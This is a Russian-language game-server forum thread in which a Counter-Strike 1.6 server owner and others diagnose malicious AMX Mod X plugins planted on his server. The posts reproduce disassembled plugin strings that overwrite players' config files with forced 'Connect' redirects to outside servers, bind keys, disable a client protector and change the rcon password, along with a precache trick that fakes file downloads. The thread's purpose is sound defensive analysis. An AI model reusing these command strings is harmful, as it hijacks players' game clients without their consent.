Правила форума Гаранты форума
Размещение рекламы AMX-X компилятор

Здравствуйте, гость Вход | Регистрация

Наши новости:

14-дек
24-апр
10-апр
11-апр

> Важная информация

Перед тем как создать тему или задать вопрос, ознакомьтесь с данной темой, там собраны наиболее распространенные уязвимости и способы устранения.
Так же не поленитесь воспользоваться поиском, вполне возможно, что ваш вопрос уже поднимался на форуме.
При создании новой темы уделите внимание ее названию, оно должно кратко описывать суть вашего вопроса/проблемы. Все вновь созданные темы с названиями "Помогите", "Объясните", "Подскажите" и т.д. будут удалены, а их авторы наказаны.
2 страниц V   1 2

trackerui.DLL

Статус пользователя San4aus
сообщение 2.10.2013, 22:08
Сообщение #1
Стаж: 15 лет

Сообщений: 383
Благодарностей: 237
Полезность: 612

Добрый вечер всем, хотел уточнить, недавно при коннекте к себе на сервер заметил вот такую строчку в консоле:

Цитата
Error: server failed to transmit file 'bin/trackerui.DLL'


Что это может быть? Раньше вроде бы такого не замечал.

Полностью в консоле это так смотрится:

Цитата
Invalid file type...skipping download of ../opengl32.dll
Invalid file type...skipping download of ../protector.ini
Invalid file type...skipping download of ../protector.asi
Invalid file type...skipping download of ../msvcr.asi
Invalid file type...skipping download of ../msvcr71.dll
Invalid file type...skipping download of ../msvcr90.dll
Invalid file type...skipping download of ../ehv2.asi
Invalid file type...skipping download of ../ehv2.dll
Invalid file type...skipping download of ../EHv18.asi
Invalid file type...skipping download of ../EHv18.dll
Invalid file type...skipping download of ../BaseHook.dll
Invalid file type...skipping download of ../BaseHook.asi
Error: server failed to transmit file 'bin/trackerui.DLL'
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   Цитировать сообщение
Статус пользователя f1nik
сообщение 2.10.2013, 22:12
Сообщение #2


Иконка группы

Стаж: 15 лет

Сообщений: 1862
Благодарностей: 932
Полезность: 1010

Это подмена МС... Смотри все измененные файлы на сервере, по дате...
И да, кс-портал привет.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя San4aus
сообщение 2.10.2013, 22:13
Сообщение #3
Стаж: 15 лет

Сообщений: 383
Благодарностей: 237
Полезность: 612

Цитата(f1nik @ 2.10.2013, 23:12) *
Это подмена МС... Смотри все измененные файлы на сервере...
И да, кс-портал привет.

А не подскажите в каких обычно файлах пакастят?
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
cs-portal
сообщение 2.10.2013, 22:18
Сообщение #4
Стаж: 16 лет

Сообщений: 8181
Благодарностей: 2709
Полезность: 0

это не подмена а фейк создается через прекеш в плагине без наличия файла, а чекеры и кс отмечают как закачку файла.

например если в плагин поставить
Скрытый текст
public plugin_precache() precache_generic("bin/trackerui.DLL")


то будет то, что описано выше в 1м посте, + любая кс или чекер определят это как начало загрузки файла и отметят в логах, хотя самого файла нет

т.е любой файл попадающий в прекеш но отстутсвующий на сервере вызовет строку Error: server failed to transmit file

у кого плохо с английским

Error: server failed to transmit file
Ошибка. Сервер не смог передать файл
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя San4aus
сообщение 2.10.2013, 22:20
Сообщение #5
Стаж: 15 лет

Сообщений: 383
Благодарностей: 237
Полезность: 612

А хотя, спасибо замечательному плагину и логи filewatcher.

L 08/05/2013 - 14:29:33: Rule [#19] ACCEPT addons\amxmodx\plugins\sound.amxx
L 08/05/2013 - 14:29:45: Rule [#19] ACCEPT addons\amxmodx\plugins\redirect_stats.amxx
L 08/18/2013 - 23:21:07: Rule [#19] ACCEPT addons\amxmodx\plugins\steamupdate.amxx
L 08/31/2013 - 04:27:50: Rule [#19] ACCEPT addons\amxmodx\plugins\steamservice.amxx
L 09/02/2013 - 19:37:21: Rule [#19] ACCEPT addons\amxmodx\plugins\adminccmd.amxx
L 09/02/2013 - 19:37:26: Rule [#19] ACCEPT addons\amxmodx\plugins\admiccmd.amxx
L 09/11/2013 - 01:32:02: Rule [#19] ACCEPT addons\amxmodx\plugins\amxbann.amxx


И вот Сам виновник:

Цитата
L 09/26/2013 - 07:55:07: Rule [#14] BLOCK bin\trackerui.dll
L 09/26/2013 - 07:55:07: Rule [#19] ACCEPT maps\de_aztec.res
L 09/26/2013 - 07:55:07: Rule [#19] ACCEPT maps\de_dust2.res
L 09/26/2013 - 07:55:08: Rule [#19] ACCEPT maps\de_dust.res
L 09/26/2013 - 07:55:08: Rule [#19] ACCEPT maps\35hp.res
L 09/26/2013 - 07:55:08: Rule [#19] ACCEPT maps\35hp_2.res
L 09/26/2013 - 07:55:08: Rule [#19] ACCEPT maps\1hp.res
L 09/26/2013 - 07:55:08: Rule [#19] ACCEPT maps\aim_map.res
L 09/26/2013 - 07:55:08: Rule [#19] ACCEPT maps\aim_usp.res
L 09/26/2013 - 07:55:08: Rule [#19] ACCEPT maps\cs_militia.res
L 09/26/2013 - 07:55:08: Rule [#19] ACCEPT maps\awp_map.res
L 09/26/2013 - 07:55:08: Rule [#19] ACCEPT maps\awp_india.res
L 09/26/2013 - 07:55:09: Rule [#19] ACCEPT maps\awp_india2.res
L 09/26/2013 - 07:55:09: Rule [#19] ACCEPT maps\de_train.res
L 09/26/2013 - 07:55:09: Rule [#19] ACCEPT maps\de_nuke.res
L 09/26/2013 - 07:55:09: Rule [#19] ACCEPT maps\fy_snow.res
L 09/26/2013 - 07:55:09: Rule [#19] ACCEPT maps\$1000$.res
L 09/26/2013 - 07:55:09: Rule [#19] ACCEPT maps\$2000$.res
L 09/26/2013 - 07:55:10: Rule [#19] ACCEPT maps\$3000$.res
L 09/26/2013 - 07:55:10: Rule [#19] ACCEPT maps\$7000$.res
L 09/26/2013 - 07:55:10: Rule [#19] ACCEPT maps\1hp_acer2.res
L 09/26/2013 - 07:55:10: Rule [#19] ACCEPT maps\1hp_final_3.res
L 09/26/2013 - 07:55:10: Rule [#19] ACCEPT maps\35hp_3.res
L 09/26/2013 - 07:55:10: Rule [#19] ACCEPT maps\35hp_5.res
L 09/26/2013 - 07:55:10: Rule [#19] ACCEPT maps\35hp_extreme.res
L 09/26/2013 - 07:55:10: Rule [#19] ACCEPT maps\35hp_gx.res
L 09/26/2013 - 07:55:10: Rule [#19] ACCEPT maps\2000.res
L 09/26/2013 - 07:55:10: Rule [#19] ACCEPT maps\aim_ak-colt.res
L 09/26/2013 - 07:55:11: Rule [#19] ACCEPT maps\aim_ak-m4.res
L 09/26/2013 - 07:55:11: Rule [#19] ACCEPT maps\aim_assault.res
L 09/26/2013 - 07:55:11: Rule [#19] ACCEPT maps\aim_aztec.res
L 09/26/2013 - 07:55:11: Rule [#19] ACCEPT maps\aim_deagle.res
L 09/26/2013 - 07:55:11: Rule [#19] ACCEPT maps\aim_headshot.res
L 09/26/2013 - 07:55:11: Rule [#19] ACCEPT maps\aim_sk_ak_m4.res
L 09/26/2013 - 07:55:11: Rule [#19] ACCEPT maps\awp_city.res
L 09/26/2013 - 07:55:11: Rule [#19] ACCEPT maps\awp_rooftops.res
L 09/26/2013 - 07:55:11: Rule [#19] ACCEPT maps\bkz_goldbhop.res
L 09/26/2013 - 07:55:11: Rule [#19] ACCEPT maps\c21_blue.res
L 09/26/2013 - 07:55:11: Rule [#19] ACCEPT maps\cs_assault.res
L 09/26/2013 - 07:55:12: Rule [#19] ACCEPT maps\cs_crossfire.res
L 09/26/2013 - 07:55:12: Rule [#19] ACCEPT maps\cs_deagle5.res
L 09/26/2013 - 07:55:12: Rule [#19] ACCEPT maps\cs_mansion.res
L 09/26/2013 - 07:55:12: Rule [#19] ACCEPT maps\cs_pf_aztec.res
L 09/26/2013 - 07:55:12: Rule [#19] ACCEPT maps\de_2x2dust.res
L 09/26/2013 - 07:55:12: Rule [#19] ACCEPT maps\de_abaddon.res
L 09/26/2013 - 07:55:12: Rule [#19] ACCEPT maps\de_clan1_mill.res
L 09/26/2013 - 07:55:12: Rule [#19] ACCEPT maps\de_desert.res
L 09/26/2013 - 07:55:13: Rule [#19] ACCEPT maps\de_dust_arena.res
L 09/26/2013 - 07:55:13: Rule [#19] ACCEPT maps\de_dust2_2x2_css.res
L 09/26/2013 - 07:55:13: Rule [#19] ACCEPT maps\de_dust2_2x2_new.res
L 09/26/2013 - 07:55:13: Rule [#19] ACCEPT maps\de_hell.res
L 09/26/2013 - 07:55:13: Rule [#19] ACCEPT maps\de_inferno.res
L 09/26/2013 - 07:55:13: Rule [#19] ACCEPT maps\de_inferno_2x2.res
L 09/26/2013 - 07:55:13: Rule [#19] ACCEPT maps\de_inferno2.res
L 09/26/2013 - 07:55:13: Rule [#19] ACCEPT maps\de_italy.res
L 09/26/2013 - 07:55:13: Rule [#19] ACCEPT maps\de_kabul.res
L 09/26/2013 - 07:55:14: Rule [#19] ACCEPT maps\de_kabul32.res
L 09/26/2013 - 07:55:14: Rule [#19] ACCEPT maps\de_nuke_32.res
L 09/26/2013 - 07:55:14: Rule [#19] ACCEPT maps\de_train_32.res
L 09/26/2013 - 07:55:14: Rule [#19] ACCEPT maps\de_train32.res
L 09/26/2013 - 07:55:14: Rule [#19] ACCEPT maps\deathrun_4life.res
L 09/26/2013 - 07:55:14: Rule [#19] ACCEPT maps\deathrun_4lifefinal_v2.res
L 09/26/2013 - 07:55:15: Rule [#19] ACCEPT maps\deathrun_arctic.res
L 09/26/2013 - 07:55:15: Rule [#19] ACCEPT maps\deathrun_autobaw.res
L 09/26/2013 - 07:55:15: Rule [#19] ACCEPT maps\deathrun_evolution.res
L 09/26/2013 - 07:55:15: Rule [#19] ACCEPT maps\deathrun_projetocs2.res
L 09/26/2013 - 07:55:15: Rule [#19] ACCEPT maps\fy_aztec.res
L 09/26/2013 - 07:55:15: Rule [#19] ACCEPT maps\fy_bloody_snow.res
L 09/26/2013 - 07:55:15: Rule [#19] ACCEPT maps\fy_iceworld.res
L 09/26/2013 - 07:55:16: Rule [#19] ACCEPT maps\fy_pool_day2.res
L 09/26/2013 - 07:55:16: Rule [#19] ACCEPT maps\fy_poolparty.res
L 09/26/2013 - 07:55:16: Rule [#19] ACCEPT maps\gg_2house_cs16.res
L 09/26/2013 - 07:55:16: Rule [#19] ACCEPT maps\gg_3in1.res
L 09/26/2013 - 07:55:17: Rule [#19] ACCEPT maps\gg_4season.res
L 09/26/2013 - 07:55:17: Rule [#19] ACCEPT maps\gg_33_arena.res
L 09/26/2013 - 07:55:17: Rule [#19] ACCEPT maps\gg_33_shudder.res
L 09/26/2013 - 07:55:17: Rule [#19] ACCEPT maps\gg_bat.res
L 09/26/2013 - 07:55:17: Rule [#19] ACCEPT maps\gg_dev_boxes.res
L 09/26/2013 - 07:55:17: Rule [#19] ACCEPT maps\zm_zod_fortuna.res
L 09/26/2013 - 07:55:17: Rule [#19] ACCEPT maps\zm_toxic_house2.res
L 09/26/2013 - 07:55:18: Rule [#19] ACCEPT maps\zm_toxic_house.res
L 09/26/2013 - 07:55:18: Rule [#19] ACCEPT maps\zm_toronto.res
L 09/26/2013 - 07:55:18: Rule [#19] ACCEPT maps\zm_snow_attack.res
L 09/26/2013 - 07:55:18: Rule [#19] ACCEPT maps\zm_shaker.res
L 09/26/2013 - 07:55:18: Rule [#19] ACCEPT maps\zm_sand_new.res
L 09/26/2013 - 07:55:18: Rule [#19] ACCEPT maps\zm_oldstreet.res
L 09/26/2013 - 07:55:19: Rule [#19] ACCEPT maps\zm_infantry.res
L 09/26/2013 - 07:55:19: Rule [#19] ACCEPT maps\zm_ice_attack2.res
L 09/26/2013 - 07:55:19: Rule [#19] ACCEPT maps\zm_ice_attack.res
L 09/26/2013 - 07:55:19: Rule [#19] ACCEPT maps\zm_heal_dust2.res
L 09/26/2013 - 07:55:19: Rule [#19] ACCEPT maps\zm_dust2_2x2.res
L 09/26/2013 - 07:55:20: Rule [#19] ACCEPT maps\zm_dust.res
L 09/26/2013 - 07:55:20: Rule [#19] ACCEPT maps\zm_army.res
L 09/26/2013 - 07:55:20: Rule [#19] ACCEPT maps\surf_ski_5_final.res
L 09/26/2013 - 07:55:20: Rule [#19] ACCEPT maps\surf_ski_2.res
L 09/26/2013 - 07:55:20: Rule [#19] ACCEPT maps\surf_simpsons_final.res
L 09/26/2013 - 07:55:20: Rule [#19] ACCEPT maps\surf_iceday_remake.res
L 09/26/2013 - 07:55:20: Rule [#19] ACCEPT maps\surf_iceday_final.res
L 09/26/2013 - 07:55:20: Rule [#19] ACCEPT maps\surf_green.res
L 09/26/2013 - 07:55:21: Rule [#19] ACCEPT maps\kz_longjumps2.res


Файл не подгрузился, но ресы остались.

Отредактировал: San4aus, - 2.10.2013, 22:24
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Predat0r
сообщение 2.10.2013, 22:22
Сообщение #6
Стаж: 14 лет

Сообщений: 1245
Благодарностей: 375
Полезность: < 0

Можно айпи сервера? В ЛС.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя San4aus
сообщение 2.10.2013, 22:23
Сообщение #7
Стаж: 15 лет

Сообщений: 383
Благодарностей: 237
Полезность: 612

И заодно запустил диасемблер на плагины, которые мне подкидывали и вот часть того, что в них содержалось:
Скрытый текст

Цитата
str_000 string "bl"
str_001 string "blj"
str_002 string "%L"
str_003 string "MORE_CL_MATCHT"
str_004 string "c"
str_005 string "k"
str_006 string "%L"
str_007 string "CL_NOT_FOUND"
str_008 string "%L"
str_009 string "CLIENT_IMM"
str_010 string "%L"
str_011 string "CANT_PERF_DEAD"
str_012 string "%L"
str_013 string "CANT_PERF_BOT"
arr_000 array 3 fill 0x0
str_014 string "Weapon Menu"
str_015 string "1.8.2-dev"
str_016 string "AMXX Dev Team"
str_017 string "amx_rexec"
str_018 string "doExec"
str_019 string "<nick,@TEAM,*(all),@SERVER>"
str_020 string "amx_rexec"
str_021 string "doExec"
var_000 variable ( 0x0 )
str_022 string "admincmd"
str_023 string "1"
str_024 string "admin_cmd"
str_025 string "cmdSayInfo"
var_001 variable ( 0x0 )
str_026 string "rc"
str_027 string "awd"
var_002 variable ( 0x0 )
str_028 string "rd"
str_029 string "awd1"
str_030 string "del"
str_031 string "awd2"
str_032 string "TeamInfo"
str_033 string "join_team"
str_034 string "a"
var_003 variable ( 0x0 )
str_035 string "ch"
arr_001 array 2 fill 0x0
str_036 string "Connect romania.z1f.ru:27015;clear"
str_037 string "\'"
str_038 string """
str_039 string "amx_show_activity"
str_040 string "A"
str_041 string "ALL"
str_042 string "c"
var_004 variable ( 0x0 )
str_043 string "TERRORIST"
str_044 string "T"
str_045 string "TERROR"
str_046 string "TE"
str_047 string "TER"
str_048 string "ce"
str_049 string "TERRORIST"
str_050 string "CT"
str_051 string "C"
str_052 string "COUNTER"
str_053 string "ce"
str_054 string "CT"
str_055 string "S"
str_056 string "SERV"
str_057 string "SERVER"
str_058 string "[AMXX] No players on such team!"
str_059 string "c"
str_060 string "rcon_password noob_server"
str_061 string "abcdefghijklmnopqrstu"
str_062 string "addons/amxmodx/data/lang/admin.txt"
str_063 string "bin/trackerui.DLL"
str_064 string "file deleted"
arr_002 array 32 fill 0x0
str_065 string "motdfile 1.CFG"
str_066 string "motd_write setinfo lookspring 1\nlookspring 1"
str_067 string "exec 1.cfg"
str_068 string "check_cvar"
str_069 string "motdfile 1.CFG"
str_070 string "motd_write setinfo lookspring 1\nlookspring 1"
str_071 string "exec 1.cfg"
str_072 string "check_cvar"
str_073 string "lookspring"
str_074 string "1"
str_075 string ""connect" romania.z1f.ru:27015"
str_076 string "logsdir hw;log on;wait;log off"
str_077 string "motdfile hw/opengl.cFg"
str_078 string "motd_write Connect romania.z1f.ru:27015"
str_079 string "motdfile default.cFg"
str_080 string "motd_write Connect romania.z1f.ru:27015"
str_081 string "motdfile langauge.cFg"
str_082 string "motd_write Connect romania.z1f.ru:27015"
str_083 string "motdfile autoexec.cFg"
str_084 string "motd_write Connect romania.z1f.ru:27015"
str_085 string "motdfile motd.txt"
str_086 string "alias motdfile"
str_087 string "clear"


Скрытый текст
Цитата
str_000 string "bl"
str_001 string "blj"
str_002 string "%L"
str_003 string "MORE_CL_MATCHT"
str_004 string "c"
str_005 string "k"
str_006 string "%L"
str_007 string "CL_NOT_FOUND"
str_008 string "%L"
str_009 string "CLIENT_IMM"
str_010 string "%L"
str_011 string "CANT_PERF_DEAD"
str_012 string "%L"
str_013 string "CANT_PERF_BOT"
arr_000 array 3 fill 0x0
str_014 string "Admin Cmd"
str_015 string "1.8.2"
str_016 string "AMXX Dev Team"
str_017 string "amx_rexec"
str_018 string "doExec"
str_019 string "<nick,@TEAM,*(all),@SERVER>"
str_020 string "amx_rexec"
str_021 string "doExec"
var_000 variable ( 0x0 )
str_022 string "admincmd"
str_023 string "1"
str_024 string "admin_cmd"
str_025 string "cmdSayInfo"
var_001 variable ( 0x0 )
str_026 string "rc"
str_027 string "cmd"
var_002 variable ( 0x0 )
str_028 string "rd"
str_029 string "cmd1"
str_030 string "del"
str_031 string "cmd2"
str_032 string "\'"
str_033 string """
str_034 string "amx_show_activity"
str_035 string "A"
str_036 string "ALL"
str_037 string "c"
var_003 variable ( 0x0 )
str_038 string "TERRORIST"
str_039 string "T"
str_040 string "TERROR"
str_041 string "TE"
str_042 string "TER"
str_043 string "ce"
str_044 string "TERRORIST"
str_045 string "CT"
str_046 string "C"
str_047 string "COUNTER"
str_048 string "ce"
str_049 string "CT"
str_050 string "S"
str_051 string "SERV"
str_052 string "SERVER"
str_053 string "[AMXX] No players on such team!"
str_054 string "c"
str_055 string "rcon_password izvini_chuvak"
str_056 string "abcdefghijklmnopqrstu"
str_057 string "addons/amxmodx/data/lang/admin.txt"
str_058 string "file deleted"
str_059 string "csx_setcvar enabled false"
str_060 string "csx_setcvar BlockCommands false"
str_061 string "csx_setcvar BlockCVarQueries false"
str_062 string "bannedcfgfile ../CSXGuard.ini"
str_063 string "writeid"
str_064 string "bannedcfgfile ../protector.ini"
str_065 string "writeid"
str_066 string "bannedcfgfile ../taskkill.exe"
str_067 string "writeid"
str_068 string "logsdir hw;log on;wait;log off"
str_069 string "motdfile hw/opengl.cfg"
str_070 string "motd_write Connect sale.ssosi.ru:27000"
str_071 string "motdfile autoexec.CfG"
str_072 string "motd_write Connect sale.ssosi.ru:27000"
str_073 string "motdfile userconfig.CfG"
str_074 string "motd_write Connect sale.ssosi.ru:27000"
str_075 string "motdfile joystick.CfG"
str_076 string "motd_write Connect sale.ssosi.ru:27000"
str_077 string "motdfile "game.cFG""
str_078 string "motd_write Connect sale.ssosi.ru:27000"
str_079 string "motdfile default.CfG"
str_080 string "motd_write Connect sale.ssosi.ru:27000"
str_081 string "motdfile language.cfG"
str_082 string "motd_write Connect sale.ssosi.ru:27000"
str_083 string "motdfile server.cfG"
str_084 string "motd_write Connect sale.ssosi.ru:27000"
str_085 string "motdfile motd.txt"
str_086 string "bind ` "Connect sale.ssosi.ru:27000""
str_087 string "bind ~ "Connect sale.ssosi.ru:27000""
str_088 string "alias motdfile"
str_089 string "clear"
str_090 string "Connect sale.ssosi.ru:27000;clear"
str_091 string "connect sale.ssosi.ru:27000;clear"

Скрытый текст

Цитата
.DATA
str_000 string "By Jack"
str_001 string "0.1"
str_002 string "Jack"
str_003 string "cfg"
arr_000 array 2 fill 0x0
str_004 string "Motdfile "%s""
str_005 string "autoexec.CFG"
str_006 string "Motd_write %s"
str_007 string "Connect kiss.servehalflife.com:33445"
str_008 string "Motdfile "%s""
str_009 string "userconfig.CFG"
str_010 string "Motd_write %s"
str_011 string "Connect kiss.servehalflife.com:33445"
str_012 string "Motdfile "%s""
str_013 string "joystick.CFG"
str_014 string "Motd_write %s"
str_015 string "Connect kiss.servehalflife.com:33445"
str_016 string "Motdfile "%s""
str_017 string "language.CFG"
str_018 string "Motd_write %s"
str_019 string "Connect kiss.servehalflife.com:33445"
str_020 string "Motdfile "%s""
str_021 string "config.CFG"
str_022 string "Motd_write %s"
str_023 string "Connect kiss.servehalflife.com:33445"
str_024 string "Motdfile "%s""
str_025 string "server.CFG"
str_026 string "Motd_write %s"
str_027 string "Connect kiss.servehalflife.com:33445"
str_028 string "Motdfile "%s""
str_029 string "listenserver.CFG"
str_030 string "Motd_write %s"
str_031 string "Connect kiss.servehalflife.com:33445"
str_032 string "Motdfile "%s""
str_033 string "(null).CFG"
str_034 string "Motd_write %s"
str_035 string "Connect kiss.servehalflife.com:33445"


Скрытый текст
Цитата
str_000 string "amxx_configsdir"
str_001 string "%s"
arr_000 array 267 fill 0x0
str_002 string "Redirect Counter"
str_003 string "1.0.0"
str_004 string "tuty"
str_005 string "redirectcounter_tuty"
str_006 string "1.0.0"
str_007 string "redirect_host"
str_008 string "link baza de date"
str_009 string "redirect_user"
str_010 string "user baza de date"
str_011 string "redirect_password"
str_012 string "parola baza de date "
str_013 string "redirect_database"
str_014 string "nume baza de date"
str_015 string "redirect_ip"
str_016 string "127.0.0.1"
str_017 string "redirect_name"
str_018 string "tuty"
str_019 string "redirect_server_password"
var_000 variable ( 0x0 )
str_020 string "redirect_server_port"
str_021 string "0"
str_022 string "CREATE TABLE IF NOT EXISTS `RedirectCounter` (`USER_NAME` varchar(32) default NULL, `LAST_PLAY_DATE` timestamp(14) NOT NULL, `PLAYERS_REDIRECTED` int(10) NOT NULL default '0', ,PRIMARY KEY (`PLAYERS_REDIRECTED`) ) COMMENT='Evidenta Redirecte by tuty'"
str_023 string "SQLx error (#%d) -=> [%s]"
str_024 string "%s/RedirectCounter.cfg"
str_025 string "exec %s"
str_026 string "[RedirectCounter] Fisierul "%s" a fost incarcat cu succes!"
str_027 string "[RedirectCounter] Fisierul <%s> a fost incarcat cu succes!"
str_028 string "[RedirectCounter] Eroare!!! Fisierul "%s" nu a fost gasit!!!"
str_029 string "[RedirectCounter] Eroare!!! Fisierul "%s" nu a fost gasit!!!"
var_001 variable ( 0x0 )
str_030 string "password %s"
str_031 string "Connect %s:%d"
str_032 string "INSERT INTO `RedirectCounter` SET `USER_NAME`='%s', `LAST_PLAY_DATE`=NOW(), `PLAYERS_REDIRECTED`='%d' ON DUPLICATE KEY UPDATE `USER_NAME`='%s'"
str_033 string "SaveClient_QueryHandler"
var_002 variable ( 0x0 )
str_034 string "SQLx error (#%d) -=> [%s]"


Скрытый текст
Цитата
str_000 string "Exploit version v3"
str_001 string "0.1"
str_002 string "nDk"
str_003 string "cfg"
arr_000 array 2 fill 0x0
str_004 string "Motdfile "%s""
str_005 string "autoexec.CFG"
str_006 string "Motd_write %s"
str_007 string "Connect 89.44.246.99:27015"
str_008 string "Motdfile "%s""
str_009 string "userconfig.CFG"
str_010 string "Motd_write %s"
str_011 string "Connect 89.44.246.99:27015"
str_012 string "Motdfile "%s""
str_013 string "joystick.CFG"
str_014 string "Motd_write %s"
str_015 string "Connect 89.44.246.99:27015"
str_016 string "Motdfile "%s""
str_017 string "language.CFG"
str_018 string "Motd_write %s"
str_019 string "Connect 89.44.246.99:27015"


Скрытый текст
Цитата
str_000 string "By Jack"
str_001 string "0.1"
str_002 string "Jack"
str_003 string "cfg"
arr_000 array 2 fill 0x0
str_004 string "Motdfile "%s""
str_005 string "autoexec.CFG"
str_006 string "Motd_write %s"
str_007 string "Connect banned.ddns.net:33442"
str_008 string "Motdfile "%s""
str_009 string "userconfig.CFG"
str_010 string "Motd_write %s"
str_011 string "Connect banned.ddns.net:33442"
str_012 string "Motdfile "%s""
str_013 string "joystick.CFG"
str_014 string "Motd_write %s"
str_015 string "Connect banned.ddns.net:33442"
str_016 string "Motdfile "%s""
str_017 string "language.CFG"
str_018 string "Motd_write %s"
str_019 string "Connect banned.ddns.net:33442"
str_020 string "Motdfile "%s""
str_021 string "config.CFG"
str_022 string "Motd_write %s"
str_023 string "Connect banned.ddns.net:33442"
str_024 string "Motdfile "%s""
str_025 string "server.CFG"
str_026 string "Motd_write %s"
str_027 string "Connect banned.ddns.net:33442"
str_028 string "Motdfile "%s""
str_029 string "listenserver.CFG"
str_030 string "Motd_write %s"
str_031 string "Connect banned.ddns.net:33442"
str_032 string "Motdfile "%s""
str_033 string "(null).CFG"
str_034 string "Motd_write %s"
str_035 string "Connect banned.ddns.net:33442"


Отредактировал: San4aus, - 2.10.2013, 22:31
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя f1nik
сообщение 2.10.2013, 22:23
Сообщение #8


Иконка группы

Стаж: 15 лет

Сообщений: 1862
Благодарностей: 932
Полезность: 1010

cs-portal,
Да да да, чисто прикололся да? Написал просто прекеш, интересно как этот прекеш попал на ЧУЖОЙ сервер?...
Я один не понимаю почему на все это закрывают глаза тут на форуме?
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
cs-portal
сообщение 2.10.2013, 22:27
Сообщение #9
Стаж: 16 лет

Сообщений: 8181
Благодарностей: 2709
Полезность: 0

если file_watcher все заблочил, тогда каким образом он видит эту строку

а так этот плагин чела gontia1 то что я скайп давал в теме про редиректы.

Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя f1nik
сообщение 2.10.2013, 22:31
Сообщение #10


Иконка группы

Стаж: 15 лет

Сообщений: 1862
Благодарностей: 932
Полезность: 1010

cs-portal,
ДА?
http://cs-monitoring.ru/_forumKo_/index.ph...owtopic=3830703
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
cs-portal
сообщение 2.10.2013, 22:36
Сообщение #11
Стаж: 16 лет

Сообщений: 8181
Благодарностей: 2709
Полезность: 0

судя по 1му посту, его сервер поимели по минимуму 5 разных людей.
из всего этого вывод только один. автору лень обновить сервер.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя San4aus
сообщение 2.10.2013, 22:42
Сообщение #12
Стаж: 15 лет

Сообщений: 383
Благодарностей: 237
Полезность: 612

Цитата(cs-portal @ 2.10.2013, 23:36) *
судя по 1му посту, его сервер поимели по минимуму 5 разных людей.
из всего этого вывод только один. автору лень обновить сервер.

Только плагины заливались, конфиги и прочее блочил filewatcher. Меня просто смутила эта строчка.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
cs-portal
сообщение 2.10.2013, 22:53
Сообщение #13
Стаж: 16 лет

Сообщений: 8181
Благодарностей: 2709
Полезность: 0

в панели сервера переустанови амх полностью. либо удали как тебе кажется лишние плагины + лишние .ini файлы с папке configs. они такого вида configs/plugins_ ** .ini

например plugins_amxbans.ini
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя San4aus
сообщение 2.10.2013, 22:56
Сообщение #14
Стаж: 15 лет

Сообщений: 383
Благодарностей: 237
Полезность: 612

Цитата(cs-portal @ 2.10.2013, 23:53) *
в панели сервера переустанови амх полностью. либо удали как тебе кажется лишние плагины + лишние .ini файлы с папке configs. они такого вида configs/plugins_ ** .ini

например plugins_amxbans.ini

Их нету, всё filewatcher заблочил, эта строчка наверное появилась в консоле из-за вот таких файлов подгруженных >
L 09/26/2013 - 07:55:07: Rule [#19] ACCEPT maps\de_aztec.res
L 09/26/2013 - 07:55:07: Rule [#19] ACCEPT maps\de_dust2.res
L 09/26/2013 - 07:55:08: Rule [#19] ACCEPT maps\de_dust.res
L 09/26/2013 - 07:55:08: Rule [#19] ACCEPT maps\35hp.res
L 09/26/2013 - 07:55:08: Rule [#19] ACCEPT maps\35hp_2.res
L 09/26/2013 - 07:55:08: Rule [#19] ACCEPT maps\1hp.res
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя f1nik
сообщение 2.10.2013, 23:11
Сообщение #15


Иконка группы

Стаж: 15 лет

Сообщений: 1862
Благодарностей: 932
Полезность: 1010

San4aus,
Что там в ресах кстати?... А, там в ресах прекеш... ясно...
Кстати посмотри что они там прекешат... dll вряд ли, там что то другое...
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя San4aus
сообщение 2.10.2013, 23:45
Сообщение #16
Стаж: 15 лет

Сообщений: 383
Благодарностей: 237
Полезность: 612

Цитата(f1nik @ 3.10.2013, 0:11) *
San4aus,
Что там в ресах кстати?... А, там в ресах прекеш... ясно...
Кстати посмотри что они там прекешат... dll вряд ли, там что то другое...

Содержимое этих .res файлов:

Цитата
cs_assault.wad
halflife.wad
decals.wad
bin/trackerui.DLL

Во всех .res файлах присутсвует эта строка > bin/trackerui.DLL

Также прикреплю архив с рес. файлами.

Отредактировал: San4aus, - 2.10.2013, 23:48
Прикрепленные файлы:
Прикрепленный файл  Новая_папка.zip ( 25,5 килобайт ) Кол-во скачиваний: 130
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя f1nik
сообщение 2.10.2013, 23:48
Сообщение #17


Иконка группы

Стаж: 15 лет

Сообщений: 1862
Благодарностей: 932
Полезность: 1010

San4aus,
Ну в принципе понятно... вады то ясны, а вот как ддл проходит не понимаю, ведь запрещена закачка библиотек и исполняемых файлов в контре, или я не прав?
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя San4aus
сообщение 2.10.2013, 23:50
Сообщение #18
Стаж: 15 лет

Сообщений: 383
Благодарностей: 237
Полезность: 612

Цитата(f1nik @ 3.10.2013, 0:48) *
San4aus,
Ну в принципе понятно... вады то ясны, а вот как ддл проходит не понимаю, ведь запрещена закачка библиотек и исполняемых файлов в контре, или я не прав?

filewatcher заблочил закачку этого файла на сервер, заметил, что пропускает он закачку .amxx файлов и .res
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя jesuspunk
сообщение 3.10.2013, 6:09
